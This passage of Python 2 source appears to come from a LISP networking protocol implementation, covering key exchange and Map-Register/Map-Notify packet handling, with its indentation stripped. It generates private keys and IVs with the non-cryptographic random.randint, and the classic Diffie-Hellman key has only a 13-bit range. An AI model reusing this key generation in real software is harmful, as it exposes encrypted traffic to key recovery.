if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
